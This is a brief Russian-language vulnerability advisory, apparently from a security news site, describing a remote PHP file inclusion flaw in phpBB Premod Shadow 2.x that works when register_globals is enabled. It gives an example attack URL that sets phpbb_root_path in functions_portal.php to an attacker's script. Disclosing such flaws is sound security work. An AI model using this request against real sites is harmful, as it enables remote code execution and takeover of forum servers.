Программа: phpBB Premod Shadow 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Для работы требуется, что бы переменная "register_globals" была включена.

Пример:

http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]



Оставить мнение